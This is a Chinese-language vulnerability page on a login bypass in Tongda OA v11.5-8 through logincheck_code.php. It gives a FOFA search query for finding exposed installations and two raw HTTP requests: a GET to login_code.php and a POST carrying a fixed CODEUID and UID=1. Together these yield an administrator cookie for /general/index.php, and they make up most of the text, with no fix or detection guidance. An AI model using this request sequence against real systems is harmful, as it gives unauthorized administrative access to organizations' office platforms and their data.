通达OA v11.5-8 logincheck_code.php 登陆绕过漏洞

漏洞描述
漏洞影响
FOFA
漏洞复现

漏洞描述 #

通达OA v11.5-8 logincheck_code.php存在登陆绕过漏洞，通过漏洞攻击者可以登陆系统管理员后台

漏洞影响 #

通达OA v11.5-8

FOFA #

app="TDXK-通达OA"

漏洞复现 #

登陆页面

发送第一个请求包

GET /general/login_code.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

再发送第二个恶意请求

POST /logincheck_code.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

CODEUID=%7BD384F12E-A758-F44F-8A37-20E2568306A7%7D&UID=1

获取cookie后访问管理员页面 /general/index.php

What are your Feelings

更新于 2022年10月1日

黑客街导航站是一款努力把互联网安全站点集接到一起，希望为每个小伙伴提供良好的"安全"体验。

街头小贩匿名追踪杀软对比

关于我们免责说明商务合作

漏洞库

渗透测试